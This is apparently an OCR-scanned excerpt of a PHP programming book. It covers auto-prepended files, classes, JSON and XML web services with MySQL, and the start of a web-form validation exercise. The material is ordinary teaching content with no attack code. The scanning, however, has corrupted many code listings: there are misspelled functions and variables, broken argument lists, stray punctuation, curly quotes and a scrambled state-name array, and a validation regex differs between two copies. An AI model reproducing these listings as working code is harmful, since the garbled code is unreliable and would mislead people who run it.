See WWW. javascriptkit. com/howto/htaccess . shtml for more infor¬ 
mation on .htaccess files. 
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Open your text editor and create a new empty file. Within the file, place the 
following code: 

<?php 

if (isset($_SESSION)) { 

print "Session has started!"; 

} else { 

print "Session has not started"; 

} 


?> 

Save the file as session. php within your document root. 

Open a web browser and point to http: //localhost/session.php. You 
should see a page like the one in Figure 1-1. 
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Minimize the web browser and create a new file within your text editor. 
Within that file place the following code: 

<?php 

session_start(); 

?> 

Save the file as prepend. php in your document root. 

Within your web browser, reload the session. php file or go to http: / / 
localhost/session, php to view the session, php file you created ear¬ 
lier. You should now see a page like the one in Figure 1-2. 
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Figure 1-2: 

Verifying 
thatthe file 
has been 
prepended. 




If you receive a blank page or an error displayed through the browser, then 
the prepended file wasn’t found. Check the simple stuff, like spelling of the 
file (prepend.php). Also check to make sure that the file you called with 
the auto_prepend_f ile directive is where it should be, in the document 
root if that’s how your web server is configured. 


If you receive a page that still says “Session has not started,” then there’s a 
chance that Apache isn’t seeing your auto_prepend_f ile directive at all. 
If you’ve placed it in an . htaccess file in your document root, you need to 
make sure that Apache is reading the . htaccess file. Continue reading or 
check with your hosting provider to see if . htaccess files are allowed. 


Some web server configurations don’t allow for . htaccess files. You can 
reconfigure Apache to allow them by changing the AllowOverride directive 
to All for the directory from which you want to read the . htaccess file (in 
this case, your document root). The directive should look like this: 

AllowOverride All 


Prepended files can be incredible helpers, but they also can sometimes 
cause confusion. For example, if you aren’t sure why a program is doing 
something, an auto-prepended file can sometimes add to that confusion 
because it loads so many other files and functions — adding ample room for 
error. Additionally, every request must now use that auto-prepended file, 
which can cause performance issues if you chain too many required and 
included files from that prepended file. With that said, the benefits usually 
outweigh the drawbacks for prepended files. 


Usin^ classes for efficiency 

You learn about object oriented programming concepts in Book IV, Chapter 
4. One of the items discussed in that chapter is the concept of classes, which 
define a certain type of object. 
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Classes can be used to provide shortcuts and helpers throughout program¬ 
ming. For example, you might have a class to define a user. You can then 
add functions (known as methods) to that user class for common things that 
users might need to do, like update their passwords. 

Without classes, you’d end up having numerous functions laying around in 
your programs, possibly clashing with each other. Imagine the scenario (this 
really happened) where you write a set of user management programs with¬ 
out classes. These programs would Include functions like changePassword, 
addPermission, setEmail, and SO on. 

Now you want to merge that code with someone else’s to add the capability 
to use groups or roles into your program. Their programs are also written 
without classes, and they have some of the same function names as your 
programs, like addPermission. When you attempt to merge them, you’ll 
find no end to the confusion and function name collisions. By the time you get 
done merging the code, you could’ve just written it all from scratch again! 

On the other hand, if you define your programs using classes, then the 
addPermission function (method) would never collide with another func¬ 
tion because the addPermission method is tied to the user class. 

Recall that to create a user in an object oriented manner (called instantiating 
a user object), you use the New keyword. For example, if your user class was 
called User (for lack of a less descriptive term), you’d instantiate it like this: 

$user = new User; 

Then when you call methods, you call them through your own copy of the 
user object, like this: 

$user->addPermission(); 

Now there can’t be a conflict because a group object would be called some¬ 
thing different. 


Reusing Code 

One of the most important aspects of programming is code reuse. Many pro¬ 
grammers have sets of programs or functions that they frequently reuse, at 
least as a starting point, to speed up their new projects. This section looks at 
a couple of techniques for code reuse in PHP, though these techniques apply 
conceptually to JavaScript and other languages, too! 


Book VI 
Chapter 1 


Improving Your 
PHP Programs 




Reusing Code 


Usin0 functions 

Book IV, Chapter 2, touches on code reuse through functions. This section 
expands on it, in light of your newfound knowledge of auto_prepend_ 
file. You can, with the help of an auto_prepend_file, create a functions 
file that’s automatically included within all your PHP programs. These func¬ 
tions might be something as simple as starting a session or as complex as an 
entire login function. 

Whenever you need or think you need to have a function in more than one 
file, rather than using require_once and include_once, if you’re going 
to use a function in multiple places then you can just as easily place it in an 

auto_prepend file. 

Here’s an example of how you can reuse code through functions. One function 
that you might use in many places is something to convert a two-letter state 
abbreviation to its full name. You can create a function to do so and place it 
in the prepended PHP file. 

This exercise assumes that you’ve completed the preceding exercise to 
create a prepend.php file and have that file automatically loading through 
your web server. 

1 . Open prepend. php from the preceding exercise. 

2. Clear any code out of prepend.php and place the following code in 
the Hie: 

<?php 

if ( ! isset($_SESSION)) { 

session_start(); 

} 

function convertState($state) { 

$stateList = array! 


AL" 

= > 

"Alabama", 

AK" 

= > 

"Alaska", 

AZ " 

= > 

"Arizona", 

AR" 

= > 

"Arkansas", 

CA" 

= > 

"California" 

CO" 

= > 

"Colorado", 

CT" 

= > 

"Connecticut 

DE" 

= > 

"Delaware", 

FL" 

= > 

"Florida", 

GA" 

= > 

"Georgia", 

HI" 

= > 

"Hawaii", 

ID" 

= > 

"Idaho", 
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IL” 

= > 

"Illinois”, 

IN” 

= > 

"Indiana", 

lA” 

= > 

"Iowa”, 

KS ” 

= > 

"Kansas”, 

KY” 

= > 

"KentuckY”, 

LA” 

= > 

"Louisiana", 

ME ” 

= > 

"Maine", 

MD” 

= > 

"MarYland”, 

MA” 

= > 

"Massachusetts" 

MI ” 

= > 

"Michigan”, 

MN” 

= > 

"Minnesota", 

MS ” 

= > 

"Mississippi", 

MO” 

= > 

"Missouri”, 

MT” 

= > 

"Montana", 

NE ” 

= > 

"Nebraska”, 

NV” 

= > 

"Nevada”, 

NH” 

= > 

"New Hampshire" 

NJ” 

= > 

"New JerseY”, 

NM” 

= > 

"New Mexico”, 

NY” 

= > 

"New York”, 

NC” 

= > 

"North Carolina 

ND” 

= > 

"North Dakota”, 

OH” 

= > 

"Ohio”, 

OK” 

= > 

"Oklahoma”, 

OR” 

= > 

"Oregon”, 

PA” 

= > 

"PennsYlvania”, 

RI ” 

= > 

"Rhode Island”, 

SC ” 

= > 

"South Carolina 

SD” 

= > 

"South Dakota”, 

TN” 

= > 

"Tennessee", 

TX” 

= > 

"Texas", 

UT” 

= > 

"Utah”, 

VT” 

= > 

"Vermont", 

VA” 

= > 

"Virginia”, 

WA” 

= > 

"Washington”, 

WV” 

= > 

"West Virginia" 

WI ” 

= > 

"Wisconsin", 

WY” 

= > 

"WYoming" 


) ; 

if (arraY_keY_exists($state,$stateList)) { 

return $stateList[$state]; 

} else { 

return false; 

} 

} //end function convertState 
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Create a new file in your text editor and place the following code into the 
editor: 

<?php 

$stateAbbrev = "WI"; 

print "State abbreviation is " . $stateAbbrev . "<br>\n"; 

$stateFull = convertState($stateAbbrev); 
if ($stateFull) { 

print "Full name is " . $stateFull . "<br>\n"; 

} else { 

print "Full name not found for {$stateAbbrev}<br>\n"; 

} 

?> 

Save the file as state .php in your document root. Open a browser and 
point to http: //localhost/state .php. You should see a page like that 
in Figure 1-3. 


Figure 1-3: 

Loading 
the state, 
php PHP 
program. 



C3('v)|S http;//Wfd/b6c: P - a C X 1 

jgtt X 


State abbre\Tation is 

FuUname is Wisconsin 

i 


The code in the prepend.php file first checks to see if the session has been 
started and starts the session, if necessary. Though it isn’t used in this file, 
it’ll be used elsewhere and builds on the example from earlier in the chapter. 
After that, it’s the typical creation of a function, which you see throughout 
the book. The function, called convertState, accepts an argument of the 
state to convert. The function sets up an array of the states and their full 
names. After that, the arraY_key_exists () PHP function is used to look 
up the state. If the two-letter abbreviation doesn’t exist in the array, false 
is returned. Otherwise the name of the state is returned. 
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The state .php file merely called the convertstate function, which is 
automatically “visible” or available because of the auto_prepend_f ile 
directive that you already set up. If there’s a value in the $stateFull variable, 
then it’s printed; otherwise, if there’s no value, as it would be if the value 
was set to Boolean false (like it might be if no state was found), then a note 
is printed to that effect. 

This example demonstrates a simple but typical function that might be com¬ 
monly used across a web application built with PHP. By moving this function 
into a file that’s included everywhere, you can use the function without 
having to do any extra work, like requiring or including the function’s file, 

wherever you want the function’s result. „ . 

Book VI 

Chapter 1 

Usin0 object-oriented programming 

Another way to promote code reuse is through object-oriented programming 
(sometimes shortened to OOP). By using an abstract class, which you learn 
about in Book IV, Chapter 4, you can reuse classes. Object-oriented program¬ 
ming typically also means thinking more about the design of the programming 
from a higher level, which means that your classes can be built to take 
advantage of reuse. 

An example of higher-level design promoting reuse is where you have mul¬ 
tiple classes that need to access user details. Rather than creating separate 
methods in each of those classes, you can build a superclass or a third class 
that provides those common methods. Doing so saves from having to create 
those same methods within each class. 


Improving Your 
PHP Programs 
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Chapter 2: Creating and Usin^ 
a Web Service 


In This Chapter 

Understanding web services 
Sharing data with web services 
Receiving web service data 


■ f you’ve read Book V, you’re already familiar with how to get data from a 
tC MySQL database. To do so, you connect to the database, execute a query 
to get some data, and then do something with the results. 

Databases work great for most everything that you’ll build with your own 
site. But there are times when you need to access information outside of your 
own database. In these instances, you might be able to use (or consume) a 
web service offered by another company. For example, Twitter offers web 
services that enable you to retrieve tweets and other information, Amazon 
offers various web services, and several other companies offer public web 
services into their data. 

This chapter looks at how to create and consume web services. We start 
with a simple web service that returns the current date and then move into 
creating other web services that accept input. 


Understanding Web Sert/ices 

When you grow your web site, you might find that you want to create web ser¬ 
vices of your own, and then offer those to external sites or have for your own 
use. Doing so means that people who want to access your data don’t need to 
do so using MySQL. They can simply call your web service to get the data. 

This greatly enhances security because you control what data is returned and 
how it’s returned, rather than someone querying your database directly. 

Web services return data in a couple different formats. PHP includes format¬ 
ting functions that make returning data from a web service almost trivial. 

Web services typically return data formatted as Extensible Markup Language 
(XML) or JavaScript Object Notation (JSON). JSON is a much less resource 
intensive format, requiring less overhead to send data and incorporate it 
into your programs. 



5lt2 Returning Data from a Web Service 


One item of note with web services is that they don’t use sessions at all. You 
can, however, include variables from a session when calling a web service, 
but you can’t access any of them, as you see later in this chapter. 


Returning Data front a Web Sert/ice 

Anything that you can return from a PHP program can be returned as a web 
service. This section looks at returning data in web service format. 

Returning the date 

A simple way to get your feet wet with web services is to return a date in 
JSON format. Here’s how you can do that: 

1 . Open your text editor or programming IDE and create a new empty file. 

2 . Piace the foilowing code within the file: 

<?php 

$header = "Content-Type: application/json"; 
header($header); 

$date = date("M d, Y"); 
print json_encode($date); 

?> 

3 . Save the file as date. php in your document root. 

4. View the page in your web browser at http: //localhost/date. php. 

You should see a page like that in Figure 2-1 (though the date will prob¬ 
ably be different). 


Figure 2-1: 

Viewing 
aJSON- 
encoded 
date web 
service. 
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The format for this web service just returns the date as a quoted string. It’s 
more common to return an array of data with each element labeled. The 
labels make it easier to find and use individual elements. For example, con¬ 
sider the code in Listing 2-1. 


Listing 2-1: JSON-Encoded Data 

<?php 

$header = "Content-Type: application/json"; 
header($header); 

$date = date(''M d, Y"); 

$returnData = array("friendlyDate" => $date); 
print json_encode($returnData); 

?> 

When viewed in a browser, the JSON-encoded data looks like that in Figure 2-2. 



As you can see, there’s now more to the returned data. This means that you 
can return all sorts of data with the same web service and the consumers 
of the web service can choose which pieces they’ll use. For example, the 
upcoming Listing 2-2 shows an enhanced date web service that returns the 
friendly date, the Unix time, the month, the day of the week, and the year in 
various formats. 

The examples shown so far (and others that create web services in this 
chapter) use the PHP header () function to send a Content-Type header 
to the browser. The Content-Type header tells the browser what type of 
information is to be expected as output. It’s important for browsers so that 
they can parse the information properly. 
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Listing 2-2: Returning Various Date Formats in a Web Service 

<?php 

$header = "Content-Type: application/json"; 
header($header); 

$friendlyDate = date("M d, Y"); 

$unixTime = time(); 

$month = date("M"); 

$dayOfWeek = date("1"); 

$year = date("Y"); 

$returnData = array( 

"friendlyDate" => $friendlyDate, 

"unixTime" => $unixTime, 

"monthNum" => $month, 

"dayOfWeek" => $dayOfWeek, 

"yearNum" => $year 

) ; 

print json_encode($returnData); 

?> 

When viewed in a browser, the code from Listing 2-2 returns data like that in 
Figure 2-3. 



With that arraylike output, it’s easy to access individual elements. Say you 
have an application that needs to know the day of the week. You can call 
your web service and use the built-in j son_decode () PHP function to get 
access to the dayOfWeek element. Listing 2-3 shows code to consume a web 
service. 
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Listing 2-3: Consuming a Web Service 

<?php 

$curlHandle = curl_init("http://localhost/date.php"); 
curl_setopt($curlHandle, CURLOPT_HEADER, 0); 
curl_setopt($CurlHandle, CURLOPT_RETURNTRANSEER, 1); 

$output = curl_exec($curlHandle); 

$decoded = json_decode($output,TRUE); 
print $decoded['dayOfWeek']; 

?> 

When this page is viewed in a browser, the output is simply the day of the 
week. The code in Listing 2-3 uses the cURL library, which connects into PHP 
through a set of powerful functions to interact with web pages and sites, 
including submitting forms. In this case, the code initializes the cURL object 
(through curl_init ( )), sets some options, and then loads the URL. 

The output is saved into a variable called $output, which is then decoded 
using the j son_decode () function. The Boolean true that you see within 
the j son_decode () function sets the output as an array, which is what you 
want. Finally, the dayOfWeek is retrieved from the decoded output and dis¬ 
played to the screen. 

This pattern is pretty typical of web service consumption. In fact, it’s 
common to set up a shared function or a class for cURL so that you can call 
cURL web services without having to include this same code in all your files. 
Chapter 1 of this minibook discusses including helper functions. 

So what’s the advantage of calling a date web service instead of just simply 
calling the date () function? That depends. On one hand, you could argue 
that setting up a common date function that returns all sorts of formats is 
easier than trying to remember the exact formatting for the date () function 
everywhere you need it. On the other hand, you could say that calling a web 
service might slow down the overall response time. Both are true and valid. 

The date () function is used in this chapter primarily because it provides 
an easy way to demonstrate returning data from a web service, without your 
humble book authors having to explain too much about what the date ( ) 
function is doing. 

Returning Web seri/ice data from a database 

A frequent use of web services is to retrieve information from a database. 
This section looks at returning simple data from a database. Later sections 
in this chapter show how to accept input and query the database through a 
web service. 
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Creating the database 

For this section, you use a database that marks whether or not a certain 
website is up and operational. The web service then simply returns “Up” or 
“Down” based on the contents of the database table. 

You use a database called sites for this section. Therefore, the first step is 
to create the database Itself, with the command: 

mYsqladinin -u <yourUser> -p create sites 

The <yourUser> in that command would be the user that you have that can 
create databases. If you’re using a shared hosting provider, you might not 
be able to create databases. If that’s the case, then you can use whatever 
database the hosting provider has created for you. If you’re using a MySQL 
server on your local computer, then the user is probably called root. 

The database table will be called siteStatus and the create statement 
for it is as follows: 

CREATE TABLE siteStatuS ( 

id INT NOT NULL PRIMARY KEY AUTO_INCREMENT, 
siteURL VARCHAR(255), 
siteStatus VARCHAR(IO) 

) ; 

You can enter that SQL into the MySQL Command Line Interface (CLI) to 
create the table. Be sure to connect to or use the sites database when cre¬ 
ating the table, with the command: 

CONNECT sites; 

or 

USE sites; 

Qnce the database has been created, a single row can be added for this 
demonstration: 

INSERT INTO siteStatus (siteURL,siteStatus) VALUES ('http:// 
WWW.braingia.org','Up'); 


Creating the ufeb seri/ice 

The web service is created by setting up the MySQL connection, querying 
the database, and then returning the data. Of course, there’s also error 
handling, in case something goes wrong with the query. 

Listing 2-4 shows the code for creating this web service. 
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Listing 2-4: A Web Service That Uses Data from a Database Query 

<?php 

$header = "Content-Type: application/json"; 
header($header); 

$dbLink = mYsqli_connect('localhost','USER','PASSWORD','si 
tes'); 

if (!$dbLink) { 

$row = array("siteStatus" => "Database Error"); 
print json_encode($row); 

} else { 

$query = "SELECT siteStatus EROM siteStatus WHERE siteURL 
= 'http://www.braingia.org'"; 

if ($result = mysqli_query($dbLink,$query)) { 

$row = $result->fetch_array(MYSQLI_ASSOC); 
if (is_null($row)) { 

$row = array("siteStatus" => "Error - Site Not 

Eound"); 

} 

} else { 

$row = array("siteStatus" => "General Error"); 

} 

print json_encode($row); 
mysqli_close($dbLink); 

} // End else condition (for database connection) 

?> 

The code from Listing 2A contains a good amount of error handling, includ¬ 
ing error handling if the database connection can’t be established, if there’s a 
problem with the query, or if the site wasn’t found. In all these cases, the end 
result is that output is sent to the user thanks to the j son_encode ($row). 

This is an important point with web services: Send output back to the web 
service consumer indicating that there was an error, rather than merely 
exiting. 

You should always include feedback in the output of the web service for error 
conditions so that the person calling the web service can handle the error. 

Figure 2-4 shows the output from this web service for non-error conditions. 
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Figure 2-4: 

Returning 
the status 
of a site 
from a web 
service. 
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Up until this point, the web services you’ve created have simply returned 
data but haven’t accepted any input of their own. You can add the capability 
to accept input and then react based on that input, much like you’d do for a 
web form. For example, you might accept input to the date web service to 
convert a date into other formats, or you might accept a URL into the site 
status web service to check its status. This section examines accepting 
input to a web service. 

Prior to accepting input, you should understand a bit about two HyperText 
Transfer Protocol (HTTP) methods. HTTP methods are ways of interacting 
with a web server. Here are two primary methods used on the web: 

♦ get: This request sends everything right along with the URL, and you 
see GET requests in the address bar of your web browser, get requests 
are limited by web browsers to a certain length (the length varies 
depending on the browser). 

♦ post: These requests send data as part of the data that gets sent to the 
server behind the scenes. POST requests are not limited by the web 
browser and are therefore appropriate for long forms or for sending 
large files through the web. 


Quer^in^ With input data 

Web services can accept input from a GET or a POST. For the purposes here, 
you use a get request to accept a URL for your site status web service. 

Listing 2-5 shows the new site status web service, with code added to 
retrieve the URL from the query string. 
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Listing 2-5: Retrieving the URL 

<?php 

$header = "Content-Type: application/json"; 
header($header); 

if (isset($_GET['siteURL'])) { 

$site = $_GET['siteURL']; 

} else { 

print json_encode(array("siteStatus" => "No site 
specified")); 
exit ; 

} 

$dbLink; = mysqli_connect('localhost','USER','PASSWORD','si 
tes'); 

if (!$dbLink) { 

$row = array("siteStatus" => "Database Error"); 
print json_encode($row); 

} else { 

$escSite = mysqli_real_escape_string($dbLink,$site); 

$query = "SELECT siteStatus FROM siteStatus WHERE siteURL 
= '{$escSite}'"; 

if ($result = mysqli_query($dbLink,$query)) { 

$row = $result->fetch_array(MYSQLI_ASSOC); 
if (is_null($row)) { 

$row = array("siteStatus" => "Error - Site Not 

Found"); 

} 

} else { 

$row = array("siteStatus" => "General Error"); 

} 

print json_encode($row); 
mysqli_close($dbLink); 

} // End else condition (for database connection) 

?> 

The primary code addition for this new web services is at the top: 

if (isset($_GET['siteURL'])) { 

$site = $_GET['siteURL']; 

} else { 

print json_encode(array("siteStatus" => "No site 
specified")); 
exit ; 

} 

This code checks to see if the siteURL variable is on the query string and if 
it is, sets it to the $site variable. 
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Later in the code, the $site variable is escaped so that it’s safe to use in a 
query, and the query itself is changed to use that newly escaped variable: 

$escSite = mysqli_real_escape_string($dbLink,$site); 

$querY = "SELECT siteStatus FROM siteStatus WHERE siteURL = 

'{$escSite}'"; 

With that code in place, the web service can be called again. This time, 
though, instead of just loading the web service like http://localhost/sitesta- 
tus.php, you need to include the URL to check as part of the address, like so: 

http://localhost/sitestatus.php?siteURL=http%3A%2F%2Fwww. 
braingia.org 

But wait! What’s all that %3a%2f%2f in the http://www.braingia.org URL? 
Those are URL-encoded characters. Certain characters are reserved or 
restricted from use in a URL. It just so happens that : / / are some of those 
restricted characters. Therefore, they need to be converted (or escaped) to 
be a safe URL to use. 

In any event, when that URL is loaded, the site is looked up in the database 
and its status is returned. 

Returning XML results 

Up until this point, you’ve been returning results in JSON format. Sometimes 
you might want to return results in XML format. You might do this because 
the consuming program for your web service can handle XML easier than 
JSON or because the person requesting the web service just wants XML. 

Listing 2-6 shows the date web service with XML output instead of JSON. 


Listing 2-6: XML Output for the date Web Service 

<?php 

$friendlyDate = date("M d, ¥","1369739047"); 
$unixTime = 1369739047; 

$month = date("M"1369739047"); 

$dayOfWeek = date ("1" , "1369739047 
$year = date("Y","1369739047") ; 

$returnData = array( 

"friendlyDate" => $friendlyDate, 
"unixTime" => $unixTime, 

"monthNum" => $month, 

"dayOfWeek" => $dayOfWeek, 

"yearNum" => $year 

) ; 
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$xinl = new DOMDocument () ; 

$datelnfoElement = $xinl->createElement("dateinformation"); 
foreach ($returnData as $keY => $value) { 

$xinlNode = $xinl->createElement ($key, $value) ; 

$datelnfoElement->appendChild($xinlNode); 

} 

$xinl->appendChild($datelnfoElement); 

$header = "Content-Type:text/xml"; 

header($header); 
print $xml->saveXML(); 

Book VI 
Chapter 2 

The primary changes for the weh service are to create an XML document. 

This is done through the DOMDocument object, which is part of PHP. With a 
new DOMDocument object instantiated, the next step is to create XML elements 
for each of the parts that you want to return. Wrap elements Inside of a 
parent element called dateinformation. Doing so keeps the XML formatted 
properly. 

The actual data for output is easy to make into XML. Because you have an 
array of date elements already, you can loop through that with a foreach () 
loop and run the createElement and appendChild methods. 

The end result of your efforts is XML that looks like this: 

<datelnformation> 

<friendlyDate>May 28, 2013</friendlyDate> 

<unixTime>13 69739047</unixTime> 

<monthNum>May</monthNum> 

<dayOfWeek>Tuesday</dayOfWeek> 

<yearNum>2 013 </yearNum> 

</dateInformation> 

Retmnin^ JSON and KML 

You now know how to return JSON data and how to return XML data. However, 
doing so means that you need to choose which one you want at programming 
time, and that can never change unless you reprogram the output. The world 
would be a better place if you could return both XML and JSON, depending 
on what the calling program wants. 

Accomplishing this feat is a matter of accepting input for the web service 
and then providing appropriate output. Listing 2-7 provides the code for this 
web service. 


Creating and Using 
a Web Service 






552 Accepting Input to a Web Ser(/ice 


Listing 2-7: XML and JSON date Web Service 

<?php 

if (isset($_GET['format'])) { 

$format = $_GET['format']; 

if (!preg_match('/json|xml/',$format)) { 

print "Please choose a format: json or xml"; 
exit; 

} 

} else { 

print "Please choose a format: json or xml"; 
exit ; 

} 

$friendlyDate = date("M d, Y"); 

$unixTime = time(); 

$month = date("M"); 

$daYOfWeek = date(" 1") ; 

$Year = date("Y"); 

$returnData = array( 

"friendlyDate" => $friendlYDate, 

"unixTime" => $unixTime, 

"monthNum" => $month, 

"dayOfWeek" => $daYOfWeek, 

"yearNum" => $year 

) ; 

if ($format == "xml") { 

$xml = new DOMDocument(); 

$datelnfoElement = $xml->createElement("dateinformat 
ion"); 

foreach ($returnData as $keY => $value) { 

$xmlNode = $xml->createElement($key,$value); 
$datelnfoElement->appendChild($xmlNode); 

} 

$xml->appendChild($datelnfoElement); 

$output = $xml->saveXML(); 

$header = "Content-Type:text/xml"; 

} else if ($format == "json") { 

$output = json_encode($returnData); 

$header = "Content-Type:application/json"; 

} 

header($header); 
print $output; 

?> 
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It may be helpful to break this code down. The first part of the code looks for 
the format to be sent back: 

if (isset($_GET['format'])) { 

$format = $_GET['format']; 

if (!preg_match('/^(json|xml)$/',$format)) { 

print "Please choose a format: json or xml”; 
exit ; 

} 

} else { 

print "Please choose a format: json or xml"; 
exit; 

} 

If a GET parameter of format is available, it’s set to the $ format variable. 
This variable is tested using the preg_match ( ) function. This function uses 
a regular expression to check that the format parameter is set to j son or 
xml (lowercase). If it isn’t, an error is displayed, as is the case if the format 
parameter is not set at all. 

From there, the code performs the same functions that you’ve seen already, 
obtaining the date in various formats and placing them into an array. Finally, 
the code sets up a conditional based on tbe requested format. If it’s XML, 
then the XML-related code is executed; if the requested format is JSON, then 
the JSON-related code is executed. Finally, the output is sent to the browser. 
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Chapter 3: (/alidatin^ Web Forms 
(Pith JavaScript and PHP 


In This Chapter 

Considering important web form validation issnes 
u* Using JavaScript validation 
Using PHP validation 


■ ijyhen you put a web form out on the Internet, you’re inviting people 
▼ ▼ to send you information. Unfortunately, not everyone fills out web 
forms correctly; some people don’t know how the phone number should be 
formatted or whether to use a five-digit or nine-digit ZIP code. In addition to 
basic mistakes, there are also malicious users who fill out forms incorrectly 
to see if they can get your program to break or if they can access data that 
they shouldn’t. 


Regardless of the reason why forms might be filled out with incorrect infor¬ 
mation, it’s up to you, the developer, to make sure that the data is formatted 
correctly prior to acting on it. For example, if someone fills out a form with 
letters instead of numbers for a ZIP code, chances are that you want to 
return some type of error message to have that user fix the issue. 

This chapter tells you what important items to consider when you’re deciding 
I how to validate your web forms, how to set up JavaScript validation and 
provide feedback to form users, and how to validate user input on the 
server side. 


Understanding HoW to Validate Web Forms 

Form validation is the process by which you examine the data from a web 
form to make sure it’s the correct and expected data in the right format. 
There are two general types of validation, client-side and server-side. 

♦ Client-side validation typically occurs with JavaScript right within the 
visitor’s web browser. 

♦ Server-side validation occurs in the code running on the server, in this 
case, the PHP code. 
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The first section of this chapter looks at some high-level items that you 
should consider when validating web forms. Some of them are obvious, while 
others are overlooked by experienced programmers and newbies alike. 

AtWat^s assume bad data 

Rule #1 in programming is to always assume that the data you’re receiving is 
incorrect and only after it’s been proven correct should it be used. Working 
with this assumption greatly simplifies your task as a programmer. With 
this assumption, you no longer need to try to think of every way that a user 
could break your program. Rather, you merely need to think about the cor¬ 
rect way to use it, and then make sure that your version of correctness is 
being followed. 


NeUer assume JavaScript 

A mistake made by new and experienced programmers alike is to assume that 
JavaScript will be enabled in the visitor’s browser. With that assumption, 
the programmers perform their validation in JavaScript and only do minimal 
validation in PHP, where it really counts. Unfortunately, JavaScript may not 
always be available, and even when it is, malicious users can still send bad 
data to the server by skipping the JavaScript checks. No amount of triple- 
extra checking to make sure JavaScript is enabled will help with that. 



The only solution is to never assume that JavaScript validation has occurred 
at all and always perform rigorous validation in PHP. Once the data gets into 
PHP, the user no longer controls it and the number of things that can go 
wrong decreases. 


Sometimes mirror ctient- and serVer-side Vatidation 

When you implement a check in JavaScript, for example, to make sure that a 
ZIP code is five digits, that same type of check should also be added to the 
PHP code. Obviously, keeping these in sync can become a bit cumbersome, 
and there are certain times when a validation check might not be appropriate 
on the client side. For example, a website visitor’s selection from a drop-down 
for state (a menu that includes Arizona, California, Wisconsin, and so on) 
probably doesn’t need to be checked in the JavaScript, but it definitely does 
need to be checked in the PHP code. 


As a general rule, though not always, you sometimes will mirror the validation 
logic between JavaScript and PHP. 


Performing Basic JavaScript Validation 


Performing Basic JaiJaScript Validation 

This section looks at basic validation using JavaScript for a variety of input 
types. This first exercise sets up the HTML for the web form. Once you com¬ 
plete this exercise and this section, you’ll have JavaScript validation done 
for the form. 


1. Open your text editor and create a new empty file. 

2. Within the file, place the following HTML: 

<!doctYpe html> 

<html> 

<head> 

<script tYpe="text/javascript" src="https://ajax. 

googleapis.com/ajax/libs/jquery/1.8.3/jquery.min. 
js"></script> 

<script type="text/javascript" src="form.js"></script> 
<link rel="stylesheet" type="text/css" href="form.css"> 
<title>A form</title> 

</head> 

<body> 

<form id="userForm" method="POST" action="form-process . 

php"> 

<div> 

<fieldset> 

<legend>User Information</legend> 

<div id="errorDiv"></div> 

<label for="name">Name;* </label> 

<input type="text" id="name" name="name"> 

<span class="errorFeedback errorSpan" 
id="nameError">Name is required</span> 

<br /> 

<label for="city">City: </label> 

<input type="text" id="city" name="city"> 

<br /> 

<label for="state">State: </label> 

<select name="state" id="state"> 
<option></option> 

<option>Alabama</option> 

<option>California</option> 
<option>Colorado</option> 
<option>Florida</option> 
<option>Illinois</option> 

<option>New Jersey</option> 

<option>New York</option> 
<option>Wisconsin</option> 

</select> 

<br /> 

<label for="zip">ZIP: </label> 
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<input tYPe="text" id="zip" naitie="zip"> 

<br /> 

<label for="email">E-mail Address:* </label> 

<input tYpe="text" id="email" name="email"> 
<span class="errorFeedback errorSpan" 
id="emailError">E-mail is required</span> 

<br /> 

<label for="phone">Telephone Number: </label> 

<input tYpe="text" id="phone" name="phone"> 
<span class="errorFeedback errorSpan" 
id="phoneError">Format: xxx-xxx-xxxx</span> 

<br /> 

<label for="work">Number Type:</label> 

<input class="radioButton" tYpe="radio" 
name="phonetYpe" id="work" value="work"> 

<label class="radioButton" for="work">Work</ 
label> 

<input class="radioButton" tYpe="radio" 
name="phone type " id="home" value="home"> 

<label class="radioButton" for="home">Home</ 
label> 

<span class="errorFeedback errorSpan 
phoneTypeError" id="phonetypeError">Please choose an 
option</span> 

<br /> 

<label for="passwordl">Password:* </label> 
<input type="password" id="passwordl" 
name="passwordl"> 

<span class="errorFeedback errorSpan" 
id="passwordlError">Password required</span> 

<br /> 

<label for="password2">Verify Password:* </ 
label> 

<input type="password" id="password2" 
name="password2"> 

<span class="errorFeedback errorSpan" 
id="password2Error">Passwords don't match</span> 

<br /> 

<input type="submit" id="submit" name="submit"> 
</fieldset> 

</div> 

</form> 

</body> 

</html> 

3. Save the file as form.php in your document root. 

4. View the Hie in your weh browser hy going to http : / /localhost/ 
form.php. 

You should see a page like that in Figure 3-1. 

The HTML looks pretty bad, with misaligned form fields and errors 
displaying. You can fix that with CSS. 
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Figure 3-1: 

A web 
form for 
validation. 



http:/Wfd/b6r3£omUP-a g>^| jg f 


I ib ☆ 0 


User Information 
Name:* 

Cin^ ~ 

State : | |tJ 

ZIP: __ 

E-mail Address:* 
Telephone Number: 


Name is required 


E-mail is required 

Format: xxx-xxx-xxxx 


Number T\ pe: O Work ^ Home Please choose an option 
Password:* Password required 

Verify* Password:* 


Passwords don't match 


Submit Query | 
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5. Create a new text file in your editor and enter the following CSS: 

form fieldset { 

display: inline-block; 

} 

.radioButton { 

float: none; 
display: inline; 
margin-right: O.lem; 
width: 2em; 

} 

form label { 

width: 8em; 
margin-right: lem; 
float: left; 
text-align: right; 
display: block; 

} 

form input { 

width: 15em; 

} 

#submit { 

margin-top: 2em; 
float: right; 

} 

.errorClass { 

background-color: #CC6666; 

} 


#errorDiv { 
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color: red; 

} 

.errorFeedback { 

visibility: hidden; 

} 


6. Save the file as form, css in your document root. 

This file was already referenced in the HTML that you created in Step 2, 
so no other changes are necessary to that file. 

7. Reload the form.php file in your browser. 

The form should now look like that in Figure 3-2. 


Figure 3-2: 

The form 
with CSS 
added. 



With the HTML and CSS in place, it’s time to add some JavaScript. Note: 
You build the validation code later in this chapter. For now, you just add 
a basic JavaScript file. 

8. Create a new text file in your editor. 

9. Place the following JavaScript in the file. 

$(document).ready(function() { 

alert("hello"); 

}) ; 

/ 0. Save the file as form, js in your document root. 

/ 1. Reload form.php in your weh browser. 

You should receive an alert dialog like the one shown in Figure 3-3. 
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Figure 3-3: 

An alert 
from 

JavaScript. 


Message from webpage 

hello 

L .. 1 


12. Click OK to dismiss the dialog. 

While the alert dialog itself is nothing new, it proves that you’ve connected 
the HTML and JavaScript correctly for this exercise. From here, you work on 
adding JavaScript validation to the form. Prior to doing so, you may find it 
helpful to break down some of the HTML and CSS that you’ve created. 

Looking at the form HTML and CSS 

The HTML used for the form is standard (and valid) HTML5. It begins by 
referencing some external files, including a Cascading Style Sheet (CSS) file 
and two JavaScript files. 

<script tYPe=''text/javascript" src= "https ://ajax. googleapis . 

com/ajax/libs/jquery/l.8.3/jquery.min.js"></script> 

<script type="text/javascript" src="form.js"></script> 

<link rel=''stylesheet" type="text/css" href="form.css"> 

